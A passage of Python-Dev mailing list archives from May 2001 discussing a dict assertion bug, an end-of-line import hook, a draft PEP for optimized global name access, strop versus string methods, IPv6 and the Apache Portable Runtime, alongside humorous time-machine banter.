interestingly hash is also 8. You wouldn't happen to have a reproducible test case? That hash==8 is almost certainly a red herring -- or a sign of wild stores. > Going back to revision 2.90 fixes the problem (or masks it). Instead of: assert(mp->ma_fill < mp->ma_size); this code used to be: if (mp->ma_fill >= mp->ma_size) { /* No room for a new key. * This only happens when the dict is empty. * Let dictresize() create a minimal dict.
*/ assert(mp->ma_used == 0); if (dictresize(mp, 0) != 0) return -1; assert(mp->ma_fill < mp->ma_size); } so the dict would get resized whenever ma_fill >= ma_size, although the code only *expected* that to happen when the dict table was NULL. It was perhaps happening in other cases too. The dict is never empty (NULL) after the patch, so the special case for "empty" got replaced by an assert. Offhand I don't see how this could be triggering -- although *something* about the 2.90 logic makes me uneasy! Ah, mp->ma_fill >= mp->ma_size wasn't a correct test: filled slots that aren't used slots don't stop a new key from being added. Assuming that's it, 2.90 could do needless calls to dictresize, but the new version does a bogus assert instead. So replace the current version's offending assert(mp->ma_fill < mp->ma_size); with assert(mp->ma_used < mp->ma_size); Let me know whether that solves it. 2.90 may also suffer a bogus assert(mp->ma_used == 0); failure. It's not easy to provoke any of this, though (requires exactly the right sequence of mixed inserts and deletes, with hash codes hitting exactly the right dict slots). From barry at digicool.com Wed May 23 22:52:22 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 16:52:22 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> Message-ID: <15116.8966.324136.897953@anthem.wooz.org> >>>>> "TW" == Thomas Wouters writes: TW> *Don't* get me started on that. If only Guido would stop TW> hogging the damned thing, I could be a 34-year-old millionaire TW> in a 10-room house and 8 girlfriends! It's really not as easy as all that, though. When Guido's not around, I've been known to, er, take The Machine for a spin (sshh! Do /not/ tell him!).
The first time I did, I didn't realize that the blue toggle had to be in the down position, and when I stepped out, everybody was speaking Esperanto, had half their heads shaved, and were toting around what looked like a cross between a dog and a beach ball (it drooled incessantly). Fortunately, The Machine has a reset button (oddly labeled "History Erase Button" and guarded by a candy-crazed TV announcer-like automaton who must be coaxed from the button with a marshmallow s'more). The second time I used it, I'd forgotten that you must keep your left hand on the silver sphere while you line up the parallel lines with the lip-actuated alpha wheel. Silly me, I'd removed my left hand just before alignment in order to twist the fluoroscopic reflection tube a quarter rotation out of phase (rule of thumb: never listen to that automaton when he's licked the last of the chocolate-y goo from his fingers. He'll say anything to get another s'more.) You really don't want to know what that particular world looked like, but let's just say it involved lots and lots of angry elephants. So now I leave well enough alone, and I've learned that if you really want to change the past, just wait for Guido to use it for his own nefarious purposes, and tape a sign to his back requesting the (very modest) change to the continuum that you're looking for. And don't forget to smear the front of that sign with s'more. -Barry From tim.one at home.com Wed May 23 23:02:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 23 May 2001 17:02:17 -0400 Subject: [Python-Dev] Assertion failed in dictobject.c In-Reply-To: Message-ID: [Jack Jansen] > I'm seeing the assert on line 525 in dictobject.c (revision 2.92) > failing. The debugger tells me that ma_fill and ma_size are both 8. > ma_used is 2, and interestingly hash is also 8. [Tim] > You wouldn't happen to have a reproducible test case?
Never mind; I do:

    d = {}
    for i in range(5):
        d[i] = i
    for i in range(5):
        del d[i]
    for i in range(5, 9):   # assert triggers when i == 8
        d[i] = i

The cure is more complicated than I described, though. From esr at thyrsus.com Thu May 24 00:39:49 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 18:39:49 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523183949.A19251@thyrsus.com> Barry A. Warsaw : > You really don't want to know what that particular world looked like, > but let's just say it involved lots and lots of angry elephants. You've been *there*? Dang...that's the timeline that scared me into hanging up my lab coat. It was a slow Saturday and I was hatching Sinister Plan For World Domination number 4. What happened to the other three? Well...I had been planning to terrorize the western U.S. with a giant mechanical spider, until some guys from Hollywood offered me way too much money for it. The trained army of radioactive gorillas I spent the movie money on didn't work out -- my Igor flatly refused to shovel any more radioactive gorilla poop, and you know how hard it is to get good help these days. Blackmailing major cities with a Zeppelin-mounted death ray projector sounded cool but Radio Shack was out of the parts. OK, so plan #4 was to create voracious mega-amoebas using my Ionic Mutatron and send them out to destroy all my enemies, especially that kid who beat me up in third grade. There I was, cackling insanely, just about to unleash these slimy horrors on an unsuspecting world to wreak havoc and destruction, when the eka-rhodium electrodes on the Mutatron arced over.
This produced a wild spike of temporokinetic energy, and guess where *I* was standing? Silly me. Before you could say "plot complication" I was materializing in the Hyraxeum -- damn near nose-to-trunk with the High Pachyderm himself, as it turned out, who was getting wound up to try out his newest human-goad on a mahout they had just captured from the Fortified Cities. The mahout was terrified out of his wits, and you would have been too if you'd seen what the High Pachyderm's tusks were covered with and the lascivious way his trunk was curled around that cheese grater. Euggghhh... It was crazy. The High Pachyderm was trumpeting like mad, tuskers charging at me from all directions, and me with at least 5.23 seconds to go until the temporokinetic charge wore off. Fortunately I remembered that elephants communicate using modulated infrasonics that they hear with the flat part of their foreheads, and I had my trusty sonic screwdriver on me. I set it to "infra" at maximum volume and hurled it at the High Pachyderm -- hit the bugger right in the tiara. He went berserk and his confused guards started crashing into each other left and right, which was a pretty impressive sight since the smallest of them weighed over two and a half tons. It was touch and go there, let me tell you. I caught one glimpse of the mahout's rapidly-retreating heels just as the charge wore off and I was slingshotted back to my lab. My sonic screwdriver, of course, followed within seconds -- horribly crushed and mangled. And that's when I swore off building fiendish devices. Electrocution I can laugh at, having my monstrous creations turn on me is all in a day's work, and that one time I was accidentally transformed into a fly I found some truly remarkable uses for a three-foot-long prehensile tongue. But what the High Pachyderm had planned was too twisted even for *me*. I decided Sinister Plan #5 would have to be a bit less hardware-intensive, if only as a rest for my frazzled nerves. 
So I spent the last juice in the batteries on the orbital mind-control lasers (long story) to implant some subtle suggestions in a few minds at Netscape and IBM and elsewhere, and started hitting the conference circuit pretty heavy. What suggestions? Oh, nothing important. Nothing at all...BWAHAHAHAHA!!! -- Eric S. Raymond Sometimes the law defends plunder and participates in it. Sometimes the law places the whole apparatus of judges, police, prisons and gendarmes at the service of the plunderers, and treats the victim -- when he defends himself -- as a criminal. -- Frederic Bastiat, "The Law" From gward at python.net Thu May 24 01:48:10 2001 From: gward at python.net (Greg Ward) Date: Wed, 23 May 2001 19:48:10 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.8966.324136.897953@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 04:52:22PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> Message-ID: <20010523194810.A9947@gerg.ca> On 23 May 2001, Barry A. Warsaw said: > The second time I used it, I'd forgotten that you must keep your left > hand on the silver sphere while you line up the parallel lines with > the lip-actuated alpha wheel. What? You mean Guido's time machine was really designed by Larry Wall? Oh, the irony... Greg -- Greg Ward - Python bigot gward at python.net http://starship.python.net/~gward/ If you can read this, thank a programmer. From dgoodger at bigfoot.com Thu May 24 03:04:46 2001 From: dgoodger at bigfoot.com (David Goodger) Date: Wed, 23 May 2001 21:04:46 -0400 Subject: [Python-Dev] Re: Import hook to do end-of-line conversion? In-Reply-To: <3B0AF45D.732126E6@home.net> Message-ID: Yesterday I found I had need for an end-of-line conversion import hook. I looked around but found none (did I miss some code on this thread?), so I whipped one up (below). It seems to do the job.
If you see any goofs, gaffes or gotchas, or if you know of a better way to do this, please let me know. I will post this code to c.l.py in a few days for the enjoyment of all. -- David Goodger dgoodger at bigfoot.com Open-source projects: - The Go Tools Project: http://gotools.sourceforge.net - reStructuredText: http://structuredtext.sourceforge.net (soon!) -----%<----------cut----------%<----------%<----------cut----------%<-----

    # Import hook for end-of-line conversion,
    # by David Goodger (dgoodger at bigfoot.com).
    # Put in your sitecustomize.py, anywhere on sys.path, and you'll be able to
    # import Python modules with any of Unix, Mac, or Windows line endings.

    import ihooks, imp, py_compile

    class MyHooks(ihooks.Hooks):

        def load_source(self, name, filename, file=None):
            """Compile source files with any line ending."""
            if file:
                file.close()
            py_compile.compile(filename)    # line ending conversion is in here
            cfile = open(filename + (__debug__ and 'c' or 'o'), 'rb')
            try:
                return self.load_compiled(name, filename, cfile)
            finally:
                cfile.close()

    class MyModuleLoader(ihooks.ModuleLoader):

        def load_module(self, name, stuff):
            """Special-case package directory imports."""
            file, filename, (suff, mode, type) = stuff
            path = None
            if type == imp.PKG_DIRECTORY:
                stuff = self.find_module_in_dir("__init__", filename, 0)
                file = stuff[0]             # package/__init__.py
                path = [filename]
            try:                            # let superclass handle the rest
                module = ihooks.ModuleLoader.load_module(self, name, stuff)
            finally:
                if file:
                    file.close()
            if path:
                module.__path__ = path      # necessary for pkg.module imports
            return module

    ihooks.ModuleImporter(MyModuleLoader(MyHooks())).install()

From jeremy at alum.mit.edu Thu May 24 03:10:55 2001 From: jeremy at alum.mit.edu (Jeremy Hylton) Date: Wed, 23 May 2001 21:10:55 -0400 (EDT) Subject: [Python-Dev] pre-PEP on optimized global names Message-ID: <200105240110.VAA09078@newman.concentric.net> I've been hoping to work on optimized global and builtin name support for Python 2.2.
I'm not sure if I'll have time, but thought I'd circulate a draft with some notes on the subject now. Anyone interested in this work? Jeremy PEP: ??? Title: Optimized Access to Module and Builtin Names Author: jeremy at digicool.com (Jeremy Hylton) Status: Draft Type: Standards Track Python-Version: 2.2 Created: 23-May-2001 Abstract This PEP proposes a new implementation of global module namespaces and the builtin namespace that speeds name resolution. The implementation would use an array of object pointers for most operations in these namespaces. The compiler would assign indices for global variables at compile time. The current implementation represents these namespaces as dictionaries. A global name incurs a dictionary lookup each time it is used; a builtin name incurs two dictionary lookups, a failed lookup in the global namespace and a second lookup in the builtin namespace. The proposed implementation should speed up Python code that uses module-level functions and variables. It should also eliminate awkward coding styles that have evolved to speed access to these names. The implementation is complicated because the global and builtin namespaces can be modified dynamically in ways that are impossible for the compiler to detect. (Example: A module's namespace is modified by a script after the module is imported.) As a result, the implementation must maintain several auxiliary data structures to preserve these dynamic features. Introduction [expand on the basic ideas in the abstract] [describe the key parts of the design: dlict, compiler support, stupid name trick workarounds, optimization of other modules' globals] DLict design The namespaces are implemented using a data structure that has sometimes gone under the name dlict. It is a dictionary that has numbered slots for some dictionary entries. The type must be implemented in C to achieve acceptable performance.
A Python implementation is included here to explain the basic design:

    """A dictionary-list hybrid"""

    import types

    class DLict:
        def __init__(self, names):
            # names maps each compile-time global name to its slot index
            assert isinstance(names, types.DictType)
            self.names = names
            size = len(names)
            self.list = [None] * size
            self.empty = [1] * size     # 1 = slot unbound, None = slot bound
            self.dict = {}              # names bound dynamically at run time
            self.size = 0               # number of bound slots

        def __getitem__(self, name):
            i = self.names.get(name)
            if i is None:
                return self.dict[name]
            if self.empty[i] is not None:
                raise KeyError, name
            return self.list[i]

        def __setitem__(self, name, val):
            i = self.names.get(name)
            if i is None:
                self.dict[name] = val
            else:
                self.store(i, val)

        def __delitem__(self, name):
            i = self.names.get(name)
            if i is None:
                del self.dict[name]
            else:
                if self.empty[i] is not None:
                    raise KeyError, name
                self.delete(i)

        def keys(self):
            return [name for name, i in self.names.items()
                    if self.empty[i] is None] + self.dict.keys()

        def values(self):
            return [self.list[i] for i in self.names.values()
                    if self.empty[i] is None] + self.dict.values()

        def items(self):
            return [(name, self.list[i]) for name, i in self.names.items()
                    if self.empty[i] is None] + self.dict.items()

        def __len__(self):
            return self.size + len(self.dict)

        def __cmp__(self, dlict):
            c = cmp(self.names, dlict.names)
            if c != 0:
                return c
            c = cmp(self.size, dlict.size)
            if c != 0:
                return c
            for i in range(len(self.names)):
                c = cmp(self.empty[i], dlict.empty[i])
                if c != 0:
                    return c
                if self.empty[i] is None:
                    c = cmp(self.list[i], dlict.list[i])
                    if c != 0:
                        return c
            return cmp(self.dict, dlict.dict)

        def clear(self):
            self.dict.clear()
            for i in range(len(self.names)):
                self.empty[i] = 1
                self.list[i] = None
            self.size = 0

        def update(self):
            pass                        # XXX not written yet

        def load(self, index):
            """dlict-special method to support indexed access"""
            if self.empty[index] is None:
                return self.list[index]
            else:
                raise KeyError, index   # XXX might want reverse mapping

        def store(self, index, val):
            """dlict-special method to support indexed access"""
            if self.empty[index] is not None:
                self.size += 1
            self.empty[index] = None
            self.list[index] = val

        def delete(self, index):
            """dlict-special method to support indexed access"""
            if self.empty[index] is None:
                self.size -= 1
            self.empty[index] = 1
            self.list[index] = None

Compiler issues The compiler currently collects the names of all global variables in a module. These are names bound at the module level or bound in a class or function body that declares them to be global. The compiler would assign indices for each global name and add the names and indices of the globals to the module's code object. Each code object would then be bound irrevocably to the module it was defined in. (Not sure if there are some subtle problems with this.) Enhancement: Optimized access to other modules' globals If one module imports another and binds a name in the global namespace, the compiler currently detects that the particular global is bound to a module. The compiler would also note accesses to any attribute of a module and emit special opcodes for accessing these names. At runtime the implementation can look up the index of the module attribute in the module's namespace. In the importing module's namespace, a pointer to the foreign module's dlict can be recorded along with the name's offset in the dlict. This would allow names, e.g. types.StringType, to be used with the same efficiency as globals. Backwards compatibility The dlict will need to maintain metainformation about whether a slot is currently used or not. It will also need to maintain a pointer to the builtin namespace. When a name is not currently used in the global namespace, the lookup will have to fail over to the builtin namespace. In the reverse case, each module may need a special accessor function for the builtin namespace that checks to see if a global shadowing the builtin has been added dynamically. This check would only occur if there was a dynamic change to the module's dlict, i.e. when a name is bound that wasn't discovered at compile-time.
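A minimal sketch of the slot-plus-fallback lookup described above, assuming Python 3. It is not the draft's own class, and the names load_global, load_name, extra, and fallback are hypothetical. Names the compiler saw get fixed slots, an unbound slot fails over to the builtins mapping, and the overflow dict for dynamically added globals is only consulted for slot-less names once something has actually been added to it.

```python
import builtins

_UNBOUND = object()  # sentinel: the slot exists but currently holds no value


class DLict:
    """Hypothetical sketch of a dict/list hybrid module namespace.

    Names the compiler saw get fixed slot indices; anything bound later
    lives in an overflow dict. Lookups fall back to a builtins mapping.
    """

    def __init__(self, slot_names, fallback):
        self.slot_names = list(slot_names)                     # index -> name
        self.index = {n: i for i, n in enumerate(self.slot_names)}
        self.slots = [_UNBOUND] * len(self.slot_names)
        self.extra = {}                                        # run-time-only bindings
        self.fallback = fallback                               # e.g. vars(builtins)

    def __setitem__(self, name, value):
        i = self.index.get(name)
        if i is None:
            self.extra[name] = value          # a binding the compiler could not see
        else:
            self.slots[i] = value

    def __delitem__(self, name):
        i = self.index.get(name)
        if i is None:
            del self.extra[name]
        elif self.slots[i] is _UNBOUND:
            raise KeyError(name)
        else:
            self.slots[i] = _UNBOUND

    def load_global(self, i):
        """Indexed load for a name with a slot; an unbound slot fails over to builtins."""
        value = self.slots[i]
        if value is not _UNBOUND:
            return value
        name = self.slot_names[i]
        try:
            return self.fallback[name]
        except KeyError:
            raise NameError(name) from None

    def load_name(self, name):
        """Load for a name without a slot (typically a builtin).

        The overflow dict is checked only if something was bound dynamically,
        so a global added at run time can shadow the builtin.
        """
        if self.extra and name in self.extra:
            return self.extra[name]
        try:
            return self.fallback[name]
        except KeyError:
            raise NameError(name) from None


if __name__ == "__main__":
    g = DLict(["counter", "len"], fallback=vars(builtins))
    g["counter"] = 3
    print(g.load_global(0))            # slot 0 is bound
    print(g.load_global(1) is len)     # slot 1 is unbound, so builtins.len is used
    g["abs"] = lambda x: "shadowed"    # dynamic global shadowing a builtin
    print(g.load_name("abs")(-2))
```

Keeping the overflow dict separate means the common case (no dynamic additions) never pays for the shadowing check, which is the trade-off the draft argues for.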
These mechanisms would have little if any cost for the common case where a module's global namespace is not modified in strange ways at runtime. They would add overhead for modules that did unusual things with global names, but this is an uncommon practice and probably one worth discouraging. It may be desirable to disable dynamic additions to the global namespace in some future version of Python. If so, the new implementation could provide warnings. Local Variables: mode: indented-text indent-tabs-mode: nil End: From barry at digicool.com Thu May 24 04:46:30 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 22:46:30 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> Message-ID: <15116.30214.900667.624573@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Before you could say "plot complication" I was materializing ESR> in the Hyraxeum -- damn near nose-to-trunk with the High ESR> Pachyderm himself, as it turned out, who was getting wound up ESR> to try out his newest human-goad on a mahout they had just ESR> captured from the Fortified Cities. That big self-important elephant wasn't named Puffy the Frog by any chance, was he? Did he taste vaguely lemony? If so, he's got a lot of nerve calling himself the "High Pachyderm"! Quite a lofty title for one whose skin is stretched to just this side of its tensile breaking point. Sure, I know ol' Puffy, had a few binges with the old goat myself. You just don't want to be near him when the stray micro-meteor happens to pierce his dermis. Much, MUCH messier than eight crates of cornbob filled to the brim with radioactive gorilla poop, I can assure you! now-where'd-i-leave-my-medication?-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:04:58 2001 From: esr at thyrsus.com (Eric S.
Raymond) Date: Wed, 23 May 2001 23:04:58 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.30214.900667.624573@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 10:46:30PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> Message-ID: <20010523230458.A28895@thyrsus.com> Barry A. Warsaw : > That big self-important elephant wasn't named Puffy the Frog by any > chance, was he? Did he taste vaguely lemony? If so, he's got a lot > of nerve calling himself the "High Pachyderm"! Quite a lofty title > for one whose skin is stretched to just this side of its tensile > breaking point. Congratulations, Barry. I googled for "Puffy the Frog" and found a page that...explained...this. It was the #1 hit. Apparently the Universe is an even more random place than I thought. -- Eric S. Raymond If I were to select a jack-booted group of fascists who are perhaps as large a danger to American society as I could pick today, I would pick BATF [the Bureau of Alcohol, Tobacco, and Firearms]. -- U.S. Representative John Dingell, 1980 From barry at digicool.com Thu May 24 05:14:07 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 23 May 2001 23:14:07 -0400 Subject: [Python-Dev] Python 2.1.1 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> Message-ID: <15116.31871.122265.883855@anthem.wooz.org> >>>>> "ESR" == Eric S Raymond writes: ESR> Congratulations, Barry. I googled for "Puffy the Frog" and ESR> found a page that...explained...this. It was the #1 hit. Yes! In 1965.
My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass singer in the Atlanta-based band "The Shrinking of George". What you found is no doubt the lyrics to that song, which topped the pop charts briefly in 1965 (August 1st, 1965, 11:57 - 13:01 to be exact), displacing the Beatles "I Wanna Hold Your Head" before being itself displaced by the The Bee Gee's "Booger Feever" [sic]. Sadly, even Napster doesn't have the mp3's and all Dad's old records are scratched beyond hope. ESR> Apparently the Universe is an even more random place than I ESR> thought. here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs, -Barry From esr at thyrsus.com Thu May 24 05:31:42 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 23 May 2001 23:31:42 -0400 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>; from barry@digicool.com on Wed, May 23, 2001 at 11:14:07PM -0400 References: <20010523160025.B690@xs4all.nl> <20010523124114.A4747@glacier.fnational.com> <20010523222751.G690@xs4all.nl> <15116.8966.324136.897953@anthem.wooz.org> <20010523183949.A19251@thyrsus.com> <15116.30214.900667.624573@anthem.wooz.org> <20010523230458.A28895@thyrsus.com> <15116.31871.122265.883855@anthem.wooz.org> Message-ID: <20010523233142.A29023@thyrsus.com> Barry A. Warsaw : > Yes! In 1965. My dad, Pumpi "Weasleteats" Warsaw, was a bluegrass > singer in the Atlanta-based band "The Shrinking of George". I suppose it's not a coincidence that it's Fernando Poo day today. Of course it's not a coincidence. There are no coincidences anywhere. Fnord. -- Eric S. Raymond Sometimes it is said that man cannot be trusted with the government of himself. Can he, then, be trusted with the government of others? 
-- Thomas Jefferson, in his 1801 inaugural address From aahz at rahul.net Thu May 24 06:59:37 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 23 May 2001 21:59:37 -0700 (PDT) Subject: [Python-Dev] Killing threads In-Reply-To: from "Tim Peters" at May 23, 2001 03:45:06 PM Message-ID: <20010524045938.5228199C83@waltz.rahul.net> Tim Peters wrote: > [Aahz] >> >> (This got brought up because I experimented with os._exit() as a >> possible solution, but that GPFs on Win98SE.) > > Please open a bug report on that, then, with a tiny test case if possible. > This worked fine on Win98SE for me just now: Futz. *Now* it works. Chalk it up to another unreproducible bug caused by an unstable Win98. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From gstein at lyra.org Thu May 24 10:33:49 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:33:49 -0700 Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Modules stropmodule.c,2.81,2.82 In-Reply-To: ; from gvanrossum@users.sourceforge.net on Mon, May 14, 2001 at 07:14:46PM -0700 References: Message-ID: <20010524013349.Y5402@lyra.org> On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > Update of /cvsroot/python/python/dist/src/Modules > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > Modified Files: > stropmodule.c > Log Message: > Add warnings to the strop module, for those functions that really > *are* obsolete; three variables and the maketrans() function are not > (yet) obsolete. > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > Add this to the NEWS. Something that I ran into the other day...
>>> ob = some_object_implementing_the_buffer_interface >>> string.find(ob, '.') (fails because ob does not define the .find method) >>> strop.find(ob, '.') (succeeds) The point is that strop uses the t# to get a ptr/len pair to do its work. Thus, it can work on many things that export the buffer interface. Dropping strop means we no longer have many of those functions. Instead, the functionality must be copied to *every* object that implements the buffer interface. We can say ob.find() now, but we can't say find(ob) any longer. And saying that all objects (which implement the buffer API) must now implement a bunch of "standard" methods is awfully burdensome. In my particular case, I was trying to do a find on a BufferObject referring to a subset of another object. Blam. No good. Thankfully, when I did a find() on an mmap object, it worked simply because mmaps happen to define a .find method. [ of course, the find method on an mmap was totally broken, but I checked in a fix for that (last week or so) ] So... my question is: is there any way that we can retain a generic find() (and similar functions from the string/strop module) that operates on any type that implements the buffer API? Maybe there is some way we can do a mixin for Python types? e.g. "this mixin implements some standard methods for 8-bit character data (using the buffer API), which can be mixed into new Python types" That would reduce the burden for new types. Thoughts? Cheers, -g -- Greg Stein, http://www.lyra.org/ From gstein at lyra.org Thu May 24 10:52:58 2001 From: gstein at lyra.org (Greg Stein) Date: Thu, 24 May 2001 01:52:58 -0700 Subject: [Python-Dev] IPv6 In-Reply-To: <200105171818.f4HIIRv12891@odiug.digicool.com>; from guido@digicool.com on Thu, May 17, 2001 at 02:18:27PM -0400 References: <200105171818.f4HIIRv12891@odiug.digicool.com> Message-ID: <20010524015258.Z5402@lyra.org> On Thu, May 17, 2001 at 02:18:27PM -0400, Guido van Rossum wrote: > What's our IPv6 story?
I recall that someone once sent me patches, > but they didn't work for me. Is it time to try again? In certain > circles IPv6 support in Python would be enough to switch programming > languages... :-) Radical suggestion: Toss out a ton of the platform-specific stuff in Python and use the Apache Portable Runtime (APR). It has IPv6 in it, but it could also help with loading shared libraries, threading, mmap'd files, sockets, etc. (it won't replace *all* of Python's platform specific stuff; I think Python has more coverage than APR does) Could simplify a number of things for Python, and reduce some of the maintenance costs... Cheers, -g -- Greg Stein, http://www.lyra.org/ From thomas at xs4all.net Thu May 24 11:01:52 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Thu, 24 May 2001 11:01:52 +0200 Subject: [Python-Dev] Python 2.1.1 In-Reply-To: ; from mwh@python.net on Thu, May 24, 2001 at 08:37:17AM +0100 References: <20010523160025.B690@xs4all.nl> Message-ID: <20010524110152.Q676@xs4all.nl> [ Answer CC'd to python-dev since it deserves an official answer :) ] On Thu, May 24, 2001 at 08:37:17AM +0100, Michael Hudson wrote: > For summarising purposes, do you have any idea when Python 2.1.1 will > be released? > "No" is a perfectly acceptable answer. Then "No" it is ! Even though I have a fair bit of patches in the queue right now, I need some more time to check out (no pun intended) the changes since the fork, and I want to browse the bug list for possible bugs that should be checked out and fixed for 2.1.1. Another couple of weeks at least, before a release candidate. It also depends on Moshe; if he actually releases 2.0.1 anytime soon, I'll hold off on 2.1.1 a bit longer. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Thu May 24 12:18:50 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 12:18:50 +0200 Subject: [Python-Dev] strop vs.
string References: <20010524013349.Y5402@lyra.org> Message-ID: <3B0CE00A.488C8D73@lemburg.com> Greg Stein wrote: > > On Mon, May 14, 2001 at 07:14:46PM -0700, Guido van Rossum wrote: > > Update of /cvsroot/python/python/dist/src/Modules > > In directory usw-pr-cvs1:/tmp/cvs-serv26415/Modules > > > > Modified Files: > > stropmodule.c > > Log Message: > > Add warnings to the strop module, for to those functions that really > > *are* obsolete; three variables and the maketrans() function are not > > (yet) obsolete. > > > > Add a compensating warnings.filterwarnings() call to test_strop.py. > > > > Add this to the NEWS. > > Something that I ran into the other day... > > >>> ob = some_object_implementing_the_buffer_interface > >>> string.find(ob, '.') > (fails because ob does not define the .find method) > >>> strop.find(ob, '.') > (succeeds) > > The point is that strop uses the t# to get a ptr/len pair to do its work. > Thus, it can work on many things that export the buffer interface. Dropping > strop means we no longer have many of those functions. Instead, the > functionality must be copied to *every* object that implements the buffer > interface. > > We can say ob.find() now, but we can't say find(ob) any longer. And saying > that all objects (which implement the buffer API) must now implement a bunch > of "standard" methods is awfully burdensome. > > In my particular case, I was trying to do a find on a BufferObject referring > to a subset of another object. Blam. No good. Thankfully, when I did a > find() on a mmap object, it worked simply because mmaps happen to define a > .find method. > > [ of course, the find method on an mmap was totally broken, but I checked in > a fix for that (last week or so) ] > > So... my question is: is there any way that we can retain a generic find() > (and similar functions from the string/strop module) that operates on any > type that implements the buffer API? > > Maybe there is some way we can do a mixin for Python types? e.g. 
"this mixin > implements some standard methods for 8-bit character data (using the buffer > API), which can be mixed into new Python types" That would reduce the burden > for new types. I suppose that in 2.2 we'll be able to build a class/type hierarchy which then provides these possibilities. I haven't followed Guido's latest checkins closely though -- could be that types don't support multiple inheritance. BTW, wouldn't it suffice to add these methods to buffer objects ? Then you could write: buffer(ob).find('.'). -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From barry at digicool.com Thu May 24 13:50:34 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Thu, 24 May 2001 07:50:34 -0400 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> Message-ID: <15116.62858.720241.46017@anthem.wooz.org> >>>>> "GS" == Greg Stein writes: GS> Toss out a ton of the platform-specific stuff in Python and GS> use the Apache Portable Runtime (APR). It has IPv6 in it, but GS> it could also help with loading shared libraries, threading, GS> mmap'd files, sockets, etc. I don't know squat about APR, but would it have to be either-or? IOW, would it be possible to wrap the APR in a module (or package) and provide it as an importable alternative? -Barry From mal at lemburg.com Thu May 24 14:22:42 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Thu, 24 May 2001 14:22:42 +0200 Subject: [Python-Dev] IPv6 References: <200105171818.f4HIIRv12891@odiug.digicool.com> <20010524015258.Z5402@lyra.org> <15116.62858.720241.46017@anthem.wooz.org> Message-ID: <3B0CFD12.164271D8@lemburg.com> "Barry A. Warsaw" wrote: > > >>>>> "GS" == Greg Stein writes: > > GS> Toss out a ton of the platform-specific stuff in Python and > GS> use the Apache Portable Runtime (APR).
It has IPv6 in it, but > GS> it could also help with loading shared libraries, threading, > GS> mmap'd files, sockets, etc. > > I don't know squat about APR, but would it have to be either-or? IOW, > would it be possible to wrap the APR in a module (or package) and > provide it as an importable alternative? Should be possible; the problem is: how do you get the APR types to interact with the original Python ones (e.g. file types). Many low-level Python functions require the native Python types, so while wrapping APR as Python module would provide an alternative, that alternative will most probably not help much w/r to simplifying portability issues. FYI, here's what the APR has to offer (taken from the APRDesign file that comes with Apache 2.0 beta):
"""
The base types in APR

file_io     File I/O, including pipes
lib         A portable library originally used in Apache. This contains
            memory management, tables, and arrays.
locks       Mutex and reader/writer locks
misc        Any APR type which doesn't have any other place to belong
network_io  Network I/O
shmem       Shared Memory (Not currently implemented)
signal      Asynchronous Signals
threadproc  Threads and Processes
time        Time
"""
